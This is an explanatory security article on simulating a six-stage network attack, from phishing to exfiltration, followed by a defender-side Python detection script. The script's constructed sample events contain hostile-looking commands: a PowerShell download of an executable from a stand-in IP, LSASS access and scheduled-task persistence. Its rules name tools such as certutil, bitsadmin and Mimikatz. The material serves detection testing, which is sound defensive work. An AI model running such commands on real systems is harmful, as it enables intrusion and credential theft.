It's surprising that the majority of network attacks aren't overly complex or reliant on cutting-edge tools exploiting obscure vulnerabilities. Instead, they often leverage readily available tools and exploit multiple points of vulnerability. Through simulating a real-world network attack, security teams can assess their detection systems, ensure they have multiple defensive layers in place, and underscore the importance of network security to leadership.
This article showcases a practical attack scenario that could easily transpire in various systems. The attack simulation draws from the MITRE ATT&CK framework, Atomic Red Team, insights from Cato Networks' field experience, and public threat intelligence. Ultimately, we underscore the significance of adopting a comprehensive security strategy for safeguarding networks.
The Significance of Simulating a Real-world Network Assault
There are three key advantages to orchestrating a simulated real-world attack on your network:
1. Testing Detections: This enables you to verify the effectiveness of your detection systems in identifying and thwarting attacks. Such testing is crucial for combating common, everyday attacks, which constitute the bulk of cyber threats.
2. Highlighting the Need for Multiple Choke Points: Real attacks demonstrate that defense against cyber threats relies on multiple layers of defense. Rarely is an attack the result of a single point of failure, underscoring the necessity for a diverse array of detection mechanisms.
3. Demonstrating Network Monitoring's Importance to Leadership: Real attacks showcase how comprehensive network monitoring provides valuable insights into breaches, facilitating effective mitigation, remediation, and incident response strategies.
Attack Sequence Overview
The attack sequence outlined below comprises six fundamental steps:
1. Initial Access
2. Ingress Tool Transfer
3. Discovery
4. Credential Dumping
5. Lateral Movement and Persistence
6. Data Exfiltration
These steps are selected for their representation of common techniques pervasive in cyber attacks.
Now, let's delve into each step:
1. Initial Access
The attack commences with spear-phishing, establishing the initial entry point into the network. For instance, an email may be sent to an employee enticing them with a lucrative job offer. The email includes an attached file. In the background, the malicious attachment executes a macro, exploiting a remote code execution vulnerability in Microsoft Office using Hoaxshell, an open-source reverse shell tool.
According to Dolev Attiya, Staff Security Engineer for Threats at Cato Networks, "Implementing a defense-in-depth strategy could have proven beneficial as early as the initial access vector. Detection of the phishing email and Hoaxshell could have been achieved through various means, such as antivirus scanning at the email gateway, endpoint antivirus, or network visibility to identify command and control network artifacts generated by the malicious document. Employing multiple controls enhances the likelihood of detecting the attack."
2. Ingress Tool Transfer
After gaining initial access, the attacker transfers additional tooling into the environment to support the later stages of the attack. These tools may include PowerShell, Mimikatz, PSX, WMI, and other utilities that run within the operating system's native environment.
Attiya elaborates, "Many of these tools are inherent to the Microsoft Windows framework and are typically utilized by administrators for system management. However, attackers can repurpose them for malicious activities."
3. Discovery
Subsequently, the attacker conducts reconnaissance to identify valuable network resources such as services, systems, workstations, domain controllers, ports, additional credentials, active IPs, and more.
According to Attiya, "This phase resembles a tourist exploring a large city for the first time. The attacker gathers information akin to asking for directions, examining buildings, checking street signs, and familiarizing themselves with the surroundings."
4. Credential Dumping
Once valuable resources are pinpointed, the previously deployed tools come into play to extract credentials from compromised systems. This action equips the attacker for lateral movement within the network.
5. Lateral Movement and Persistence
Armed with the acquired credentials, the attacker moves laterally across the network, accessing additional systems. The objective is to expand their foothold by compromising as many users and devices as possible, ideally with elevated privileges, which in turn widens the search for sensitive data worth exfiltrating. For instance, obtaining administrator credentials grants access to large portions of the network. Attackers often proceed cautiously, scheduling tasks for later execution to evade detection and to maintain access. This stealthy progression lets them operate inside the network for extended periods without raising suspicion.
Etay Maor, Senior Director of Security Strategy, underscores the prevalence and effectiveness of tools like Mimikatz, stating, "Mimikatz is ubiquitous. Its prowess in password extraction is unparalleled, and its decryption capabilities are swift, sometimes taking mere seconds. Mimikatz is utilized across the board, including by nation-state actors."
6. Data Exfiltration
Ultimately, the attacker identifies valuable data for extraction. This data may be transferred from the network to a cloud-based file-sharing system, encrypted for ransomware deployment, or utilized for other nefarious purposes.
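As an added, defender-side illustration of testing detections across the six stages above (example code written for this page, not the article's own material or any Cato Networks tooling): the script runs simple rules over constructed endpoint and network events, records which telemetry layer caught each stage, and lists the stages that no layer caught. All event values, process names and thresholds are constructed assumptions.

```python
import re

# Constructed sample telemetry (not real logs), one dict per event, loosely
# following the six-stage sequence: Office spawning a script host, a download,
# a domain query, LSASS access, a scheduled task on a second host, bulk upload.
EVENTS = [
    {"layer": "endpoint", "host": "ws01", "parent": "WINWORD.EXE", "image": "powershell.exe", "cmd": "powershell.exe -w hidden"},
    {"layer": "endpoint", "host": "ws01", "parent": "powershell.exe", "image": "powershell.exe", "cmd": "Invoke-WebRequest http://203.0.113.10/t.exe -OutFile t.exe"},
    {"layer": "network", "host": "ws01", "dst": "203.0.113.10", "bytes_in": 1_200_000, "bytes_out": 2_000},
    {"layer": "endpoint", "host": "ws01", "parent": "cmd.exe", "image": "net.exe", "cmd": "net group \"Domain Admins\" /domain"},
    {"layer": "endpoint", "host": "ws01", "parent": "cmd.exe", "image": "t.exe", "cmd": "t.exe", "target": "lsass.exe"},
    {"layer": "endpoint", "host": "fs01", "parent": "wmiprvse.exe", "image": "schtasks.exe", "cmd": "schtasks /create /tn Updater /tr C:\\t.exe /sc once"},
    {"layer": "network", "host": "fs01", "dst": "share.example.net", "bytes_in": 5_000, "bytes_out": 900_000_000},
]

OFFICE = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DISCOVERY_TOOLS = {"net.exe", "nltest.exe", "whoami.exe", "ipconfig.exe"}
STAGES = ["Initial Access", "Ingress Tool Transfer", "Discovery", "Credential Dumping",
          "Lateral Movement and Persistence", "Data Exfiltration"]

# Each rule is (stage, predicate). Two rules cover tool transfer so that the
# endpoint and network layers can each catch it independently (assumed thresholds).
RULES = [
    ("Initial Access", lambda e: e.get("parent") in OFFICE and e.get("image") in SCRIPT_HOSTS),
    ("Ingress Tool Transfer", lambda e: re.search(r"Invoke-WebRequest|certutil.*-urlcache|bitsadmin", e.get("cmd", ""), re.I)),
    ("Ingress Tool Transfer", lambda e: e["layer"] == "network" and e.get("bytes_in", 0) > 500_000),
    ("Discovery", lambda e: e.get("image") in DISCOVERY_TOOLS),
    ("Credential Dumping", lambda e: e.get("target") == "lsass.exe" or "mimikatz" in e.get("cmd", "").lower()),
    ("Lateral Movement and Persistence", lambda e: e.get("image") == "schtasks.exe" and "/create" in e.get("cmd", "").lower()),
    ("Data Exfiltration", lambda e: e["layer"] == "network" and e.get("bytes_out", 0) > 100_000_000),
]

def detect(events):
    """Return {stage: set of telemetry layers whose rules fired for that stage}."""
    hits = {s: set() for s in STAGES}
    for e in events:
        for stage, rule in RULES:
            if rule(e):
                hits[stage].add(e["layer"])
    return hits

def blind_spots(events):
    """Stages no layer caught; a non-empty list means a missing choke point."""
    return [s for s, layers in detect(events).items() if not layers]

if __name__ == "__main__":
    for stage, layers in detect(EVENTS).items():
        print(f"{stage:34s} caught by: {sorted(layers) or 'nothing'}")
    print("blind spots:", blind_spots(EVENTS))
```

Re-running with only one telemetry source (filter EVENTS by "layer") shows which stages that single layer misses, which is the "multiple choke points" argument in concrete form.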
Protecting Against Network Incursions
Effectively safeguarding against attackers requires multiple detection layers. Each security layer along the kill chain must be carefully managed and integrated with the others so that an attacker who slips past one control is caught by the next. This comprehensive approach anticipates and mitigates the attacker's likely moves, strengthening overall security resilience.